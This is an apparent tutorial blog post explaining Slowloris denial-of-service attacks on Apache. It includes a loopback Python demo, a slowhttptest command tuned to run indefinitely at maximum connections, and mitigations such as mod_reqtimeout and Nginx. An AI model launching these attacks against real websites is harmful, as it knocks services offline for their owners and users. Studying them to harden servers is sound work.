Taking Down a Website With a Raspberry Pi

What is a DoS attack?

Okay, so if you’re unfamiliar with the concept of a DoS attack (Denial of Service), the traditional idea is that you flood a website (or game server, or workstation, etc.) with enough traffic that it becomes overloaded and can no longer do its job (like serving web pages or running a Minecraft server).

Normally, this is done with raw traffic volume: you fire a huge number of packets or TCP connection requests at a server until its network link (or its provider’s) is saturated. The problem with that approach is that you need more upstream bandwidth than your target has downstream bandwidth. Easy fix: add more attackers. A DDoS attack (Distributed Denial of Service) is when a collection of machines floods a single target with traffic. But of course, that means you need a collection of computers you can bend to your will, like a botnet (or you can just buy one).

But in both scenarios, you’re not going to take down a target that has far more bandwidth than you, which describes most websites. So how can we fix that?

Strategic DoS Attacks

Those types of DoS attacks use brute force – “my gun is bigger than your gun” – and aren’t generally very efficient. So instead of attacking the target’s bandwidth, a hacker attacks the target’s software. Websites run on programs, called web servers, that process requests from browsers and serve users web pages. Sometimes, web servers have flaws. If a hacker can exploit one of these vulnerabilities, they may be able to crash a website, or even get inside and change it.

That’s where we arrive here. One of the most popular web servers is Apache HTTP Server (Apache2 on Debian, or just Apache). Apache is very easy to configure and is a popular choice for beginners, and plenty of well-known websites use it too. But Apache has a weakness: in its traditional configuration, it is bad at handling large numbers of simultaneous connections, because each open connection ties up a worker for as long as it stays open.

Unfortunately, Apache is a big, memory-hungry program. With the prefork MPM (the classic setup, and the one you are stuck with if you use mod_php), every connection is handed to its own worker process; with the worker MPM it gets its own thread. Either way, that worker holds memory for as long as the connection lasts. To keep that from eating the whole machine, the developers built in a cap on simultaneous connections: the MaxRequestWorkers directive (MaxClients in older versions). On my setup, it was 200 connections. Once that many workers are busy, new connections queue in the listen backlog, and the server must wait for one connection to finish before it can serve another.

You can see where I’m headed with this, can’t you?

Based on that fact, all an attacker has to do is open that many connections to the target website and hold them, and the website effectively goes offline; nobody else can get a worker. To hold a connection open without ever finishing a request, the attacker sends a valid start of an HTTP request and then dribbles out the remaining header lines very, very slowly, never sending the blank line that ends the headers. Apache waits politely for the rest, keeping the connection (and its worker) tied up. This is called a Slowloris attack.

The difference between this and traditional DoS attacks? You don’t need a massive internet connection. All you need is a little bit of code that can pull it off.
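To make the mechanism concrete, here is an added example of my own; it is not code from the original post and not slowhttptest’s source. The “server” is a toy stand-in for Apache’s prefork worker pool: a fixed number of workers, each owning one connection until the request headers are complete, and no minimum-rate header timeout. The client does what slowhttptest’s default slow-headers mode does: it opens connections, sends a partial request, and keeps trickling bogus header lines without ever sending the terminating blank line. The worker count, timeouts, and the loopback address are all chosen for the demo, and the probe models slowhttptest’s “service available” check.

```python
import socket
import threading
import time

HEADER_TIMEOUT = 5.0   # seconds a worker waits for the rest of a request's headers
PROBE_TIMEOUT = 1.0    # seconds the availability probe waits for a reply


class CappedServer:
    """Toy stand-in for Apache prefork: a fixed pool of workers, one connection each.

    The acceptor only calls accept() when a worker is free, so once every worker
    is tied up, new connections sit unread in the kernel's listen backlog.
    """

    def __init__(self, max_workers):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))          # OS picks a free port
        self.sock.listen(64)
        self.port = self.sock.getsockname()[1]
        self.workers = threading.Semaphore(max_workers)   # MaxRequestWorkers, in effect
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            self.workers.acquire()                # wait for a free worker
            try:
                conn, _ = self.sock.accept()
            except OSError:                       # listening socket was closed
                self.workers.release()
                return
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        """One worker: read headers until the blank line, then answer."""
        try:
            conn.settimeout(HEADER_TIMEOUT)       # generous; no mod_reqtimeout-style rate check
            buf = b""
            while b"\r\n\r\n" not in buf:
                chunk = conn.recv(4096)
                if not chunk:                     # client hung up
                    return
                buf += chunk
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n"
                         b"Connection: close\r\n\r\nok")
        except OSError:
            pass
        finally:
            conn.close()
            self.workers.release()                # worker goes back to the pool

    def close(self):
        try:
            self.sock.shutdown(socket.SHUT_RDWR)  # unblock a pending accept()
        except OSError:
            pass
        self.sock.close()


class SlowlorisClient:
    """Opens N connections and feeds each one header lines, never the final blank line."""

    def __init__(self, host, port, connections):
        self.socks = []
        for _ in range(connections):
            s = socket.create_connection((host, port))
            # A legitimate-looking request start that is deliberately left unfinished
            s.sendall(b"GET / HTTP/1.1\r\nHost: %s\r\nUser-Agent: slow\r\n" % host.encode())
            self.socks.append(s)

    def keep_alive(self):
        """Trickle one more bogus header so the server keeps waiting (slowhttptest's -i)."""
        for s in self.socks:
            s.sendall(b"X-a: b\r\n")

    def close(self):
        for s in self.socks:
            s.close()


def service_available(host, port, timeout=PROBE_TIMEOUT):
    """The 'service available' check: does a normal, complete request get answered in time?"""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.1\r\nHost: %s\r\n\r\n" % host.encode())
            return s.recv(64).startswith(b"HTTP/1.1 200")
    except OSError:                               # refused, reset, or timed out
        return False


def demonstrate(max_workers=5, attack_connections=5):
    """Return availability (before, during, after) holding `attack_connections` open."""
    server = CappedServer(max_workers)
    try:
        before = service_available("127.0.0.1", server.port)
        attack = SlowlorisClient("127.0.0.1", server.port, attack_connections)
        time.sleep(0.2)                           # let every worker pick up a victim
        attack.keep_alive()
        during = service_available("127.0.0.1", server.port)   # expect False: pool is full
        attack.close()
        time.sleep(0.2)                           # workers see EOF and free up
        after = service_available("127.0.0.1", server.port)    # expect True
    finally:
        server.close()
    return before, during, after


if __name__ == "__main__":
    b, d, a = demonstrate()
    print(f"before attack: {b}, during attack: {d}, after attack: {a}")
```

Note that the attacker needs exactly as many held connections as the server has workers, and the attack costs almost no bandwidth: a few header bytes per connection every few seconds. Drop attack_connections below max_workers and the probe keeps succeeding, which is the “even one idle worker and it still serves users” point. A server that enforces a header deadline or minimum receive rate (as Apache’s mod_reqtimeout does) would close these half-finished connections and recover.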

The Nitty-Gritty

Best of all, that code is free. If you have a tiny Linux computer, just install the package “slowhttptest”.

If you’re running Debian like I do, that’s as simple as “apt install slowhttptest” (as root, or with sudo).

After that, you have all the software you need to run a Slowloris attack. Go ahead and spin up a quick Apache2 server of your own to test against. Let’s say its IP address is 10.0.0.2. All you have to do to run the attack is, on your attacker machine with slowhttptest, run:

slowhttptest -c 65539 -l 2147483647 -u http://10.0.0.2/

(slowhttptest’s default mode, -H, is the slow-headers attack described above, so no mode flag is needed.)

Those are some weird numbers, but the idea is simple. They push the program to overload the target, because the defaults are too low to exhaust a real server. The values we just set are the maximums. Let’s take a look at the options we chose:

-c is the maximum number of connections it will try to open. The default is 50, which is below the connection limit of any real Apache setup. Remember, if there is even one idle worker on the server, it can still serve users, so we need to overcompensate hard. Each held connection also costs your attacking machine an open file descriptor, so if you genuinely want thousands, raise the open-file limit (ulimit -n) first.

-l is the length of time (in seconds) the test will run. By default, this is just 240 seconds (4 minutes), after which slowhttptest stops and the target recovers. If you want to keep it down longer, raise it; 2147483647 is the largest 32-bit signed integer, so this run will not stop on its own.

-u is the target URL. slowhttptest is unforgiving here: it does not fix up a sloppy URL, so type it exactly. Make sure it starts with “http://” or “https://” depending on which the website uses, and that it ends with “/”.

Eventually, if the website is running a vulnerable Apache, the program’s status line will report “service available: NO”.
But if you keep the attack running and it keeps reporting the service available even after your connection count rises past 1000, then the website is probably not vulnerable. A lot of popular websites run Nginx instead of Apache. Nginx is event-driven, so an idle connection does not tie up a worker, and it can easily hold thousands of open connections on a low-end web host. Apache itself can also be hardened: the event MPM stops idle keep-alive connections from each occupying a worker, and mod_reqtimeout (the RequestReadTimeout directive) drops any client that does not deliver its headers within a time limit or at a minimum rate, which is precisely what a Slowloris client fails to do. Whether a particular Apache server falls over depends on those settings as much as on its being Apache. I recently migrated from Apache2 to Nginx, which is what sparked the creation of this post.

That’s all there is to it. It uses very little bandwidth and CPU on your end; so little that you can run it on something as small as a Raspberry Pi on a 1 megabit internet connection!

Disclaimer

Though this should be obvious, I feel I have to put a disclaimer at the bottom of all my articles regarding cyberattacks.
YES, it is illegal to run this tool against a website you do not have permission to test. Denial of Service attacks are very detrimental to the welfare of websites, and attacking them will make their owners very, very mad.